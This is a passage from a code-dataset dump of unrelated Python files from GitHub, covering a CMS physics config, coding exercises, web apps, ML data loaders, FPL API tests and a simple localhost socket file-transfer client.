'/store/user/algomez/JetHT/Run2015B-PromptReco-v1_RUNA_v06/150930_081418/0000/RUNtuples_106.root',\n\t\t '/store/user/algomez/JetHT/Run2015B-PromptReco-v1_RUNA_v06/150930_081418/0000/RUNtuples_107.root',\n\t\t '/store/user/algomez/JetHT/Run2015B-PromptReco-v1_RUNA_v06/150930_081418/0000/RUNtuples_108.root',\n\t\t#'file:RUNtuple_1.root'\n\t )\n\t)\n\n#process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )\nprocess.maxEvents = cms.untracked.PSet( input = cms.untracked.int32 (options.maxEvents) )\n\nif 'bj' in NAME: bjsample = True\nelse: bjsample = False\n\nif 'JetHT' in NAME:\n\tHTtrigger = 'HLT_PFHT800'\nelse: \n\tHTtrigger = 'HLT_PFHT900'\n\nprocess.TFileService=cms.Service(\"TFileService\",fileName=cms.string( 'RUNFullAnalysis_'+NAME+'.root' ) )\n\nprocess.ResolvedAnalysisPlots = cms.EDAnalyzer('RUNAnalysis',\n\t\tcutHT\t \t\t= cms.double( options.HT ),\n\t\tcutMassRes \t\t= cms.double( options.MassRes ),\n\t\tcutDelta \t\t= cms.double( options.Delta ),\n\t\tcutEtaBand \t\t= cms.double( options.EtaBand ),\n\t\tcutJetPt \t\t= cms.double( options.JetPt ),\n\t\tbjSample\t\t= cms.bool( bjsample ),\n\t\ttriggerPass \t\t= cms.vstring( [ HTtrigger, 'HLT_PFHT750_4JetPt' ] ) \n)\nprocess.RUNATree = process.ResolvedAnalysisPlots.clone( mkTree = cms.bool( True ) )\n\n\nprocess.BoostedAnalysisPlots = cms.EDAnalyzer('RUNBoostedAnalysis',\n\t\tcutjetPtvalue \t\t= cms.double( options.boostedJetPt ),\n\t\tcutHTvalue \t\t= cms.double( options.boostedHT ),\n\t\tcutAsymvalue \t\t= cms.double( options.Asym ),\n\t\tcutCosThetavalue \t= cms.double( options.CosTheta ),\n\t\tcutSubjetPtRatiovalue \t= cms.double( options.SubPt ),\n\t\tcutTau31value \t\t= cms.double( options.Tau31 ),\n\t\tcutTau21value \t\t= cms.double( options.Tau21 ),\n\t\tcutDEtavalue \t\t= cms.double( options.DEta ),\n\t\tcutBtagvalue \t\t= cms.double( options.btag ),\n\t\tbjSample\t\t= cms.bool( bjsample ),\n\t\tmkTree\t\t\t= cms.bool( False ),\n\t\ttriggerPass \t\t= cms.vstring( [ 'HLT_AK8PFHT700_TrimR0p1PT0p03Mass50', HTtrigger ] )\n\n)\n\nprocess.BoostedAnalysisPlotsTrimmed = process.BoostedAnalysisPlots.clone( jetMass = cms.InputTag('jetsAK8:jetAK8trimmedMass') )\nprocess.BoostedAnalysisPlotsFiltered = process.BoostedAnalysisPlots.clone( jetMass = cms.InputTag('jetsAK8:jetAK8filteredMass') )\nprocess.BoostedAnalysisPlotsPruned = process.BoostedAnalysisPlots.clone( \n\t\tjetMass \t\t= cms.InputTag('jetsAK8:jetAK8prunedMass'),\n\t\t#### Subjets\n\t\t#subjetPt \t\t= cms.InputTag('subjetsAK8Pruned:subjetAK8PrunedPt'),\n\t\t#subjetEta \t\t= cms.InputTag('subjetsAK8Pruned:subjetAK8PrunedEta'),\n\t\t#subjetPhi \t\t= cms.InputTag('subjetsAK8Pruned:subjetAK8PrunedPhi'),\n\t\t#subjetE \t\t= cms.InputTag('subjetsAK8Pruned:subjetAK8PrunedE'),\n\t\t#subjetMass \t\t= cms.InputTag('subjetsAK8Pruned:subjetAK8PrunedMass'),\n\t\t)\nprocess.BoostedAnalysisPlotsSoftDrop = process.BoostedAnalysisPlots.clone( jetMass = cms.InputTag('jetsAK8:jetAK8softDropMass') )\nprocess.BoostedAnalysisPlotsPuppi = process.BoostedAnalysisPlots.clone( \n\t\tjetPt \t\t\t= cms.InputTag('jetsAK8Puppi:jetAK8PuppiPt'),\n\t\tjetEta\t\t\t= cms.InputTag('jetsAK8Puppi:jetAK8PuppiEta'),\n\t\tjetPhi \t\t\t= cms.InputTag('jetsAK8Puppi:jetAK8PuppiPhi'),\n\t\tjetE \t\t\t= cms.InputTag('jetsAK8Puppi:jetAK8PuppiE'),\n\t\tjetMass \t\t= cms.InputTag('jetsAK8Puppi:jetAK8PuppiMass'),\n\t\tjetTau1 \t\t= cms.InputTag('jetsAK8Puppi:jetAK8Puppitau1'),\n\t\tjetTau2 \t\t= cms.InputTag('jetsAK8Puppi:jetAK8Puppitau2'),\n\t\tjetTau3 \t\t= 
cms.InputTag('jetsAK8Puppi:jetAK8Puppitau3'),\n\t\tjetNSubjets \t\t= cms.InputTag('jetsAK8Puppi:jetAK8PuppinSubJets'),\n\t\tjetSubjetIndex0 \t= cms.InputTag('jetsAK8Puppi:jetAK8PuppivSubjetIndex0'),\n\t\tjetSubjetIndex1 \t= cms.InputTag('jetsAK8Puppi:jetAK8PuppivSubjetIndex1'),\n\t\tjetSubjetIndex2 \t= cms.InputTag('jetsAK8Puppi:jetAK8PuppivSubjetIndex0'),\n\t\tjetSubjetIndex3 \t= cms.InputTag('jetsAK8Puppi:jetAK8PuppivSubjetIndex1'),\n\t\tjetKeys \t\t= cms.InputTag('jetKeysAK8Puppi'),\n\t\t#### Subjets\n\t\tsubjetPt \t\t= cms.InputTag('subjetsAK8Puppi:subjetAK8PuppiPt'),\n\t\tsubjetEta \t\t= cms.InputTag('subjetsAK8Puppi:subjetAK8PuppiEta'),\n\t\tsubjetPhi \t\t= cms.InputTag('subjetsAK8Puppi:subjetAK8PuppiPhi'),\n\t\tsubjetE \t\t= cms.InputTag('subjetsAK8Puppi:subjetAK8PuppiE'),\n\t\tsubjetMass \t\t= cms.InputTag('subjetsAK8Puppi:subjetAK8PuppiMass'),\n\t\t)\n\n\nprocess.RUNATreeSoftDrop = process.BoostedAnalysisPlotsSoftDrop.clone( mkTree = cms.bool( True ) )\nprocess.RUNATreePruned = process.BoostedAnalysisPlotsPruned.clone( mkTree = cms.bool( True ) )\n\nif options.debug:\n\tprocess.p = cms.Path( process.ResolvedAnalysisPlots\n\t\t\t* process.BoostedAnalysisPlots )\nelse:\n\n\tprocess.p = cms.Path( process.ResolvedAnalysisPlots\n\t\t#* process.RUNATree\n\t\t#* process.BoostedAnalysisPlots\n\t\t#* process.BoostedAnalysisPlotsTrimmed\n\t\t* process.BoostedAnalysisPlotsPruned\n\t\t#* process.BoostedAnalysisPlotsSoftDrop\n\t\t#* process.BoostedAnalysisPlotsPuppi\n\t\t#* process.BoostedAnalysisPlotsFiltered\n\t\t#* process.RUNATreeSoftDrop\n\t\t#* process.RUNATreePruned\n\t\t)\n\n\nprocess.MessageLogger.cerr.FwkReport.reportEvery = 1000\n","repo_name":"davidsheffield/RUNA","sub_path":"RUNAnalysis/test/RUNFullAnalysis_cfg.py","file_name":"RUNFullAnalysis_cfg.py","file_ext":"py","file_size_in_byte":8717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"9763425284","text":"#!/usr/bin/python3\nimport os\nfrom subprocess import call\n\nORDEN_OFICIAL = [\n \"West_Germany\",\n \"Hungary\",\n \"Austria\",\n \"Uruguay\",\n \"Switzerland\",\n \"Brazil\",\n \"England\",\n \"Yugoslavia\",\n \"France\",\n \"Turkey\",\n \"Italy\",\n \"Belgium\",\n \"Mexico\",\n \"Czechoslovakia\",\n \"Scotland\",\n \"South_Korea\"\n]\nREEMPLAZOS = {\n \"West Germany\", \"West_Germany\",\n \"South Korea\", \"South_Korea\"\n}\n\ndef traducir(f_input, f_output):\n equipos = {}\n resultados = []\n for linea in f_input:\n if '-' in linea and \"[-\" not in linea and \"finals\" not in linea and \"Group\" not in linea and \"Third\" not in linea:\n linea = linea.replace(\"West Germany\", \"West_Germany\").replace(\"South Korea\", \"South_Korea\")\n palabras_utiles = [palabra for palabra in linea.split(\" \")\n if not any([l in palabra for l in (\"(\",\")\",\".\",\":\",\"/\")])\n and len(palabra) != 0]\n if \"-\" in palabras_utiles[4]:\n del palabras_utiles[4]\n nombre_jugador_1, resultado, nombre_jugador_2 = palabras_utiles[2:5]\n jugadores = []\n for nombre_jugador in (nombre_jugador_1, nombre_jugador_2):\n if not nombre_jugador in equipos.keys():\n if len(equipos) > 0:\n equipos[nombre_jugador] = max(equipos.values()) + 1\n else:\n equipos[nombre_jugador] = 1\n jugadores.append(equipos[nombre_jugador])\n jugador_1, jugador_2 = jugadores\n goles_1, goles_2 = resultado.split(\"-\")\n if goles_1 == goles_2:\n continue\n ganador = jugador_1 if goles_1 > goles_2 else jugador_2\n perdedor = jugador_2 if goles_1 > goles_2 else jugador_1\n resultados.append((ganador, 
max(goles_1, goles_2), perdedor, min(goles_1, goles_2)))\n print(len(equipos), len(resultados), file=f_output)\n for resultado in resultados:\n print(1, *resultado, file=f_output)\n return equipos\n\n\ndef parsear_e_imprimir():\n with open(\"worldcup-original.txt\") as f_input:\n with open(\"worldcup.txt\", \"w\") as f_output:\n return traducir(f_input, f_output)\n\n\ndef ejecutar_pagerank(c):\n with open(\"worldcup.in\", \"w\") as f_output:\n print(\"0 %.2f 1 worldcup.txt 0.00001\" % c, file=f_output)\n call([\"../../../../bin/tp2\", \"worldcup.in\", \"worldcup.out\"])\n\n\ndef parsear_salida(equipos):\n with open(\"worldcup.out\") as f_input:\n puntajes = [float(linea) for linea in f_input]\n puntajes_por_equipo = []\n for indice_1, puntaje in enumerate(puntajes):\n for equipo, indice_2 in equipos.items():\n if indice_1+1 == indice_2:\n puntajes_por_equipo.append((puntaje, equipo))\n puntajes_por_equipo.sort(key=lambda tupla: tupla[0])\n puntajes_por_equipo.reverse()\n for puntaje, equipo in puntajes_por_equipo:\n print(equipo, puntaje)\n return diferencia_con_ideal([equipo for puntaje, equipo in puntajes_por_equipo])\n\n\ndef diferencia_con_ideal(orden):\n error = 0\n for posicion, jugador in enumerate(orden):\n error += abs(posicion - ORDEN_OFICIAL.index(jugador))\n return error\n\n\ndef plotear_salida(res):\n import matplotlib.pyplot as plt\n c = [t[0] for t in res]\n posiciones = [t[1] for t in res]\n plt.plot(c, posiciones, 'o-')\n x1, x2, y1, y2 = plt.axis()\n plt.axis((0, x2, 0, y2))\n plt.ylabel(\"Diferencia entre GeM y oficial\")\n plt.xlabel(\"Valor de c\")\n plt.savefig(\"1954.png\")\n\nequipos = parsear_e_imprimir()\ndiferencias = []\nfor c in [i*0.1 for i in range(10)]:\n print(c)\n ejecutar_pagerank(c)\n diferencia = parsear_salida(equipos)\n diferencias.append((c, diferencia))\n print(diferencia)\nplotear_salida(diferencias)\n","repo_name":"svilerino/metnum","sub_path":"tp2/src/exp/exp6/1954/worldcup.py","file_name":"worldcup.py","file_ext":"py","file_size_in_byte":3830,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"41082266690","text":"class Dog(object):\n __instance = None\n __init_flag = False\n\n def __init__(self, name):\n if Dog.__init_flag == False:\n self.name = name\n Dog.__init_flag = True\n\n def __new__(cls, name):\n if cls.__instance == None:\n cls.__instance = object.__new__(cls)\n return cls.__instance\n\n\ndog1 = Dog(\"旺财\")\nprint(dog1.name)\nprint(id(dog1))\n\ndog2 = Dog(\"哮天犬\")\n\nprint(id(dog2))\nprint(dog2.name)\nprint(\"--------------------------\")\nprint(dog1.name)\n","repo_name":"Ziyear/python_learn","sub_path":"day_03_包和对象/3.单例.py","file_name":"3.单例.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"39547901625","text":"import os\nimport subprocess\nimport sys\n\ntry:\n import jinja2\nexcept ModuleNotFoundError:\n subprocess.check_call([sys.executable, \"-m\", \"pip\", \"install\", \"jinja2\"])\n import jinja2\n\nSOURCES = f\"{os.path.dirname(os.path.abspath(__file__))}/src/\"\nFILES = {\"index.html\": {}, \"projects-2019-2020.html\": {}}\nTEMPLATE = \"_template.html\"\n\n\ndef render_template(file, variables):\n env = jinja2.Environment(loader=jinja2.FileSystemLoader(SOURCES))\n return env.get_template(file).render(TEMPLATE=TEMPLATE, **variables)\n\n\ndef main():\n for item, variables in FILES.items():\n with open(item, \"w\") as out:\n try:\n os.makedirs(os.path.dirname(item))\n 
except FileNotFoundError:\n pass\n\n out.write(render_template(item, variables))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"hornercodingclub/hornercodingclub.github.io","sub_path":"build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"2418108598","text":"# Approach - 1 : Iterating over elements O(n*2**n) time and space\nclass Solution:\n def subsets(self, nums):\n n = len(nums)\n output = [[]]\n \n for num in nums:\n output += [curr + [num] for curr in output]\n \n return output\n\n\nsol = Solution()\nprint(sol.subsets([1,2,3]))\n\n#--------------------------------------------------------------------\n\n# Approach - 1 : Bit masking O(n*2**n) time and space\nclass altSolution:\n def subsets(self, nums):\n n = len(nums)\n output = []\n \n for i in range(2**n, 2**(n + 1)):\n # generate bitmask, from 0..00 to 1..11\n bitmask = bin(i)[3:]\n \n # append subset corresponding to that bitmask\n output.append([nums[j] for j in range(n) if bitmask[j] == '1'])\n \n return output\n\natlSol = altSolution()\nprint(atlSol.subsets([1,2,3]))","repo_name":"NvsYashwanth/Leetcode","sub_path":"Leetcode Python/Subsets.py","file_name":"Subsets.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"27429968102","text":"def bmi(A,B):\n BMI=A/(B)**2\n return BMI\n\nheight=float(input('height(m):'))\nweight=float(input('weight(kg):'))\nBMI=bmi(weight,height)\nprint('BMI:',BMI)\nif BMI <= 18.5:\n print('light')\nelif BMI >= 24:\n print('heavy')\nelse:\n print('normal')","repo_name":"Leesyuwei/Singular_Practice","sub_path":"python/pycode/BMIcaculator0821.py","file_name":"BMIcaculator0821.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"15517674232","text":"from fastapi import APIRouter, File, UploadFile, Response\nfrom .schemas import BurgerMenu\nfrom .utils import (\n convert_from_image_to_cv2,\n show_img,\n)\nfrom .detector import DetectorBurgerMenu\n\nimport base64\nfrom io import BytesIO\nfrom PIL import Image\n\nrouter = APIRouter(\n prefix=\"/detect_burger_menu\",\n tags=[\"Burger menu\"],\n)\n\ndetector = DetectorBurgerMenu()\n\n\n@router.post(\"/\")\nasync def get_burger_menu(data: BurgerMenu):\n \"\"\"\n Детекция значка бургер-меню на полученном изображении\n \"\"\"\n img = data.img_base64\n img = base64.b64decode(img)\n img = Image.open(BytesIO(img))\n # img = convert_from_image_to_cv2(img)\n img, elements = detector(img)\n\n # раскоментировать для отладки\n # show_img(convert_from_image_to_cv2(img))\n\n return {\n \"status\": \"success\",\n \"data\": elements,\n \"details\": None,\n }\n\n\n@router.post(\"/test_json\")\nasync def get_burger_menu(data: UploadFile = File(...)):\n \"\"\"\n Тестирование детекции значка бургер-меню с возвращением координат\n \"\"\"\n img = Image.open(data.file)\n img, elements = detector(img)\n\n return {\n \"status\": \"success\",\n \"data\": elements,\n \"details\": None,\n }\n\n\n@router.post(\"/test_img\")\nasync def get_burger_menu(data: UploadFile = File(...)):\n \"\"\"\n Тестирование детекции значка бургер-меню с возвращением изображения\n \"\"\"\n img = Image.open(data.file)\n img, _ = detector(img)\n\n img_byte_arr = BytesIO()\n img.save(img_byte_arr, format='PNG')\n\n return Response(content=img_byte_arr.getvalue(), 
media_type=\"image/png\")\n","repo_name":"igorobed/fastapi-ui-elements-detection","sub_path":"src/burger_menu/router.py","file_name":"router.py","file_ext":"py","file_size_in_byte":1777,"program_lang":"python","lang":"ru","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"7122090081","text":"c = 0\r\nsoma = 0\r\nfor x in range(1,7,1):\r\n a = float(input())\r\n if a > 0:\r\n c = c + 1\r\n soma = soma + a\r\n\r\nprint('%d valores positivos' % c)\r\nprint('%.1f' % (soma/c))","repo_name":"cesarfois/URI_JUDGE","sub_path":"1064 - Positivos e Média.py","file_name":"1064 - Positivos e Média.py","file_ext":"py","file_size_in_byte":185,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"30619950238","text":"from collections import defaultdict\nfrom collections import Counter\nfrom itertools import combinations\n\n\nclass Solution(object):\n def mostVisitedPattern(self, username, timestamp, website):\n \"\"\"\n :type username: List[str]\n :type timestamp: List[int]\n :type website: List[str]\n :rtype: List[str]\n \"\"\"\n d = defaultdict(list)\n\n for t, u, w in sorted(zip(timestamp, username, website)):\n d[u].append(w)\n\n c = Counter()\n for u in d:\n c += Counter(set(seq for seq in combinations(d[u], 3)))\n target = max(c.values())\n\n return min(list(k) for k in c if c[k] == target)\n","repo_name":"baldFemale/LeetCode-Solution","sub_path":"python/HashMap/Analyze User Website Visit Pattern/Analyze User Website Visit Pattern.py","file_name":"Analyze User Website Visit Pattern.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"18"} +{"seq_id":"16241572060","text":"# Credit to Corey Shafer for providing the tutorial for this application\n\n# This setup script is provided by The Pallets Projects here:\n# https://flask.palletsprojects.com/en/1.1.x/quickstart/#quickstart\nfrom flask import Flask, render_template\n\napp = Flask(__name__)\n\n\nposts = [\n {\n 'author': 'Patrick Yeadon',\n 'title': 'Blog Post - 1',\n 'content': 'My first post!',\n 'date_posted': 'December 11, 2019'\n },\n {\n 'author': 'Patrick Yeadon',\n 'title': 'Blog Post - 2',\n 'content': 'My second post!',\n 'date_posted': 'December 11, 2019'\n },\n {\n 'author': 'Patrick Yeadon',\n 'title': 'Blog Post - 3',\n 'content': 'My third post!',\n 'date_posted': 'December 11, 2019'\n }\n]\n\n\n# Home Page\n@app.route('/')\n@app.route('/home')\ndef home():\n # Return HTML\n return render_template('home.html', posts=posts)\n\n\n# About Page\n@app.route('/about')\ndef about():\n # Return HTML\n return render_template('about.html', title='About')\n\n\n# If this file is run directly, launch the web application in debug mode\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"yeadonpg/WebApp-1.0","sub_path":"flaskblog.py","file_name":"flaskblog.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"69968817001","text":"\"\"\"Sarcasm headline data processing.\"\"\"\n\nimport pandas as pd\n\n\ndef read_sarcasm_data(datafile):\n \"\"\"Reads clickbait data into a DataFrame.\n Returns:\n DataFrame with columns \"headline\" and \"is_sarcastic\"\n \"\"\"\n\n data = pd.read_json(\n datafile,\n orient=\"records\",\n dtype={\"is_sarcastic\": bool})\n # We don't care about this (for now at least)\n del data[\"article_link\"]\n\n return 
data\n","repo_name":"lePerdu/cwaas","sub_path":"ml/sarcasm.py","file_name":"sarcasm.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"9108017545","text":"import socket\nfrom tqdm import tqdm\nimport os\n\nfilename = \"large.txt\"\nfilesize = os.path.getsize(filename)\n\ndef main():\n print(\"hi\")\n s = socket.socket()\n s.connect((socket.gethostname(), 3339))\n\n data = f\"{filename}_{filesize}\"\n print(data)\n s.send(data.encode(\"utf-8\"))\n msg = s.recv(1024).decode(\"utf-8\")\n print(f\"server msg: {msg}\")\n\n bar = tqdm(range(filesize), f\"sending {filename}\", unit=\"B\", unit_scale=True, unit_divisor=1024)\n with open(filename, 'r') as f:\n while True:\n data = f.read(1024)\n if not data:\n break\n s.send(data.encode(\"utf-8\"))\n bar.update(len(data))\n s.close()\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"rohithmn01/media","sub_path":"reverseShell/LargeFileTrans/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"27983099179","text":"import numpy as np\nfrom random import shuffle\nimport os\nimport cPickle as pickle\nimport numpy \nimport cv2\n\n\ndef unpickle(file):\n fo = open(file, 'rb')\n dict = pickle.load(fo)\n fo.close()\n return dict['data'], dict['labels']\n\n\ndef cifar_generator(filenames, celeba_data, batch_size, data_dir, mode_frac=None):\n \n # reshaping CelebA\n celeba_images_reshaped = []\n for i in range(len(celeba_data)):\n img = celeba_data[i]\n img = img.astype(np.float32)\n img = img[:, :, ::-1]\n img = numpy.transpose(img, (2, 0, 1)) \n celeba_images_reshaped.append(img)\n celeba_images_reshaped = np.array(celeba_images_reshaped)\n celeba_images_reshaped = celeba_images_reshaped.reshape(celeba_images_reshaped.shape[0], -1)\n\n if mode_frac!=None:\n num_celeba = int(celeba_images_reshaped.shape[0]*mode_frac[1])\n celeba_images_reshaped = celeba_images_reshaped[0:num_celeba, ::]\n celeba_targets = np.zeros((celeba_images_reshaped.shape[0],)).astype(np.int)\n\n print(celeba_images_reshaped.shape)\n print('Loading {} CelebA images'.format(celeba_images_reshaped.shape[0]))\n \n \n # reading CIFAR\n all_data = []\n all_labels = []\n for filename in filenames: \n data, labels = unpickle(data_dir + '/' + filename)\n all_data.append(data)\n all_labels.append(labels)\n\n images = np.concatenate(all_data, axis=0)\n labels = np.concatenate(all_labels, axis=0)\n \n if mode_frac!=None:\n shuffle(images)\n shuffle(labels)\n num_cifar = int(images.shape[0]*mode_frac[0])\n images = images[0:num_cifar, ::]\n labels = labels[0:num_cifar]\n \n print('Loading {} CIFAR-10 images'.format(images.shape[0]))\n \n print('Ranges')\n print(celeba_images_reshaped.min())\n print(celeba_images_reshaped.max())\n print(images.min())\n print(images.max())\n # concatenating MNIST and CIFAR\n images = np.concatenate((images, celeba_images_reshaped), axis=0)\n labels = np.concatenate((labels, celeba_targets), axis=0)\n \n def get_epoch():\n rng_state = np.random.get_state()\n np.random.shuffle(images)\n np.random.set_state(rng_state)\n np.random.shuffle(labels)\n\n for i in range(len(images) / batch_size):\n yield (images[i*batch_size:(i+1)*batch_size], labels[i*batch_size:(i+1)*batch_size])\n\n return get_epoch\n\n\ndef load_celeba(celeba_path, num_files_to_load):\n\n filelist = os.listdir(celeba_path)\n shuffle(filelist)\n filelist = 
filelist[0:num_files_to_load]\n\n img_all = []\n for f in filelist:\n fpath = os.path.join(celeba_path, f)\n img = cv2.imread(fpath)\n img_all.append(img)\n\n return img_all\n\n\ndef load(batch_size, cifar_dir, celeba_dir, mode_frac=None):\n\n # loading CelebA in RAM\n celeba_imgs = load_celeba(celeba_dir, 100000)\n celeba_test = load_celeba(celeba_dir, 20000)\n\n return (\n cifar_generator(['data_batch_1','data_batch_2','data_batch_3','data_batch_4','data_batch_5'],\n celeba_imgs, batch_size, cifar_dir, mode_frac),\n cifar_generator(['test_batch'], celeba_test, batch_size, cifar_dir, mode_frac)\n )\n","repo_name":"yogeshbalaji/Normalized-Wasserstein","sub_path":"NWGAN/vision/tflib/cifar10_celeba.py","file_name":"cifar10_celeba.py","file_ext":"py","file_size_in_byte":3199,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"18"} +{"seq_id":"37675389935","text":"import unittest\nfrom fplpandas import FPLPandas\nimport logging as log\nimport warnings\n\nlog.basicConfig(level=log.INFO, format='%(message)s')\n\n\nclass TestFplPandas(unittest.TestCase):\n def test_get_teams(self):\n log.info(f'Downloading teams ...')\n fpl = FPLPandas()\n teams = fpl.get_teams()\n log.info(f'Downloaded {teams.shape[0]} teams.')\n\n self.assertTrue(teams.shape[0] > 0)\n\n def test_get_game_weeks(self):\n log.info(f'Downloading game weeks ...')\n fpl = FPLPandas()\n game_weeks = fpl.get_game_weeks()\n log.info(f'Downloaded {game_weeks.shape[0]} game weeks.')\n\n self.assertTrue(game_weeks.shape[0] == 38)\n\n def test_get_game_weeks_by_ids(self):\n log.info(f'Downloading game weeks ...')\n fpl = FPLPandas()\n game_weeks = fpl.get_game_weeks([1,2])\n log.info(f'Downloaded {game_weeks.shape[0]} game weeks.')\n\n self.assertTrue(game_weeks.shape[0] == 2)\n\n def test_get_fixtures(self):\n log.info(f'Downloading fixtures ...')\n fpl = FPLPandas()\n fixtures = fpl.get_fixtures()\n log.info(f'Downloaded {fixtures.shape[0]} fixtures.')\n\n self.assertTrue(fixtures.shape[0] > 0)\n\n def test_get_players(self):\n warnings.filterwarnings(action='ignore', message='unclosed', category=ResourceWarning)\n\n log.info(f'Downloading data for all players ...')\n with warnings.catch_warnings():\n warnings.filterwarnings(\"ignore\")\n fpl = FPLPandas()\n players, history_past, history, fixtures = fpl.get_players()\n log.info(f'Downloaded {players.shape[0]} players.')\n\n self.assertTrue(players.shape[0] > 0)\n self.assertTrue(history_past.shape[0] > 0)\n self.assertTrue(history.shape[0] >= 0)\n self.assertTrue(fixtures.shape[0] >= 0)\n\n def test_get_player(self):\n id = 1\n log.info(f'Downloading data for player {id} ...')\n fpl = FPLPandas()\n player, history_past, history, fixtures = fpl.get_player(id)\n log.info(f'Downloaded.')\n\n self.assertTrue(player.shape[0] == 1)\n self.assertTrue(history_past.shape[0] >= 0)\n self.assertTrue(history.shape[0] >= 0)\n self.assertTrue(fixtures.shape[0] >= 0)\n\n def test_get_user_team(self):\n email = 'fpl@177arc.net'\n log.info(f'Downloading team data for account {email}...')\n fpl = FPLPandas(email, 'TestMcTestFace')\n user_team, chips, transfers = fpl.get_user_team()\n log.info(f'Team data downloaded.')\n\n self.assertTrue(user_team.shape[0] > 0)\n\n def test_get_user_info(self):\n email = 'fpl@177arc.net'\n log.info(f'Downloading user info for account {email}...')\n fpl = FPLPandas(email, 'TestMcTestFace')\n user_info = fpl.get_user_info()\n log.info(f'User info downloaded.')\n\n self.assertTrue(user_info.shape[0] > 0)\n\n\nif __name__ == 
'__main__':\n unittest.main()\n","repo_name":"177arc/pandas-fpl","sub_path":"tests/integration/test_fplpandas.py","file_name":"test_fplpandas.py","file_ext":"py","file_size_in_byte":2973,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"18"} +{"seq_id":"16324165820","text":"from torch.utils.data import Dataset\nfrom torch.utils.data import DataLoader\nfrom torchvision import utils, transforms\nfrom torch.utils.data import random_split\nfrom PIL import Image\nfrom typing import List\nimport torch\n\n# -------------------------------------------------------\ndef get_datasets(image_size, flip_prob, train_val, img_list):\n \"\"\"\n A wrapper to get train and test datasets\n \"\"\"\n images = []\n with open(img_list, 'r') as f:\n for line in f:\n images.append(line.replace('\\n', ''))\n\n img2model = get_img_transofrms(flip_prob, image_size)\n # create datasets\n train_imgs, test_imgs = split_dataset(images, train_val)\n train_dataset = star_dataset(train_imgs, img2model, device='cpu')\n test_dataset = star_dataset(test_imgs, img2model, device='cpu')\n \n return train_dataset, test_dataset\n# -------------------------------------------------------\n\ndef get_img_transofrms(flip_prob, image_size):\n \"\"\"\n Returns image transformations\n \"\"\"\n return transforms.Compose([\n transforms.RandomHorizontalFlip(flip_prob),\n transforms.RandomVerticalFlip(flip_prob),\n transforms.Resize(image_size),\n transforms.CenterCrop(image_size),\n transforms.ToTensor(), \n transforms.Lambda(lambda t: (t * 2) - 1)\n ])\n# -------------------------------------------------------\n\ndef unscale_tensor(T):\n \"\"\"\n Unscale a tensor from [-1,1] to [0,1]\n \"\"\"\n return (T+1)/2\n# -------------------------------------------------------\n\nclass star_dataset(Dataset):\n \"\"\"\n A simple wrapper to read filed from a folder.\n It requires list of paths to each image constituiting \n a dataset (being it a training or a validation one)\n \"\"\"\n def __init__(self, dataset_imgs, transforms = None, device = 'cpu'):\n self.dataset_imgs = dataset_imgs\n self.device = device\n self.transform = transforms\n \n def __len__(self):\n return len(self.dataset_imgs)\n \n def __getitem__(self, idx): \n if self.transform: \n return self.transform(Image.open(self.dataset_imgs[idx])).to(self.device)\n else:\n return Image.open(self.dataset_imgs[idx]).to(self.device)\n# ------------------------------------------------------- \n \ndef split_dataset(images: List[str], train_val:float = 0.8):\n \"\"\"\n Splits list of images into lists of such \n for training and validation.\n \n Inputs:\n images: list[str], list of full path to each image\n train_val: float\n \n Rerun:\n train_imgs: List[str], list of path to each image in train dataset\n test_imgs: List[str], list of path to each image in test dataset\n \"\"\"\n \n train_size = int(train_val * len(images))\n test_size = len(images) - train_size\n train_dataset, test_dataset = random_split(images, [train_size, test_size])\n train_imgs, test_imgs = [], []\n\n for i in train_dataset:\n train_imgs.append(i)\n\n for i in test_dataset:\n test_imgs.append(i)\n \n return train_imgs, test_imgs\n# ------------------------------------------------------- \n \ndef save_grid_imgs(img_tensor, nrow, fname):\n \"\"\"\n Saves a tensor into a grid image\n \"\"\"\n out = 0\n try:\n grid_img = utils.make_grid(img_tensor.to('cpu'), nrow = nrow)\n utils.save_image(grid_img, fp = fname)\n except:\n out = 1\n return out\n# 
------------------------------------------------------- \n \ndef get_star_mean_std(img_list, img_size, num_workers = 0):\n \"\"\"\n Wrapper to find a mean and std for the stars dataset\n \n \"\"\"\n img_transforms = transforms.Compose([\n transforms.CenterCrop(img_size),\n transforms.Resize(max(img_size)),\n transforms.ToTensor(), \n ])\n total_dataset = star_dataset(img_list, img_transforms, device='cpu')\n total_dataloader = DataLoader(\n dataset = total_dataset,\n batch_size = len(total_dataset), shuffle=False, \n num_workers=num_workers)\n return mean_std(total_dataloader)\n# -------------------------------------------------------\n \ndef mean_std(loader):\n \"\"\"\n Finds mean and std for the whole dataset.\n \n The dataloader must have bath size to be equal \n to the length of the dataset.\n \n Avoid any randomness (i.e. random modification in the image transforms,\n if any) or shuffling the dataset\n \n Taken from \n 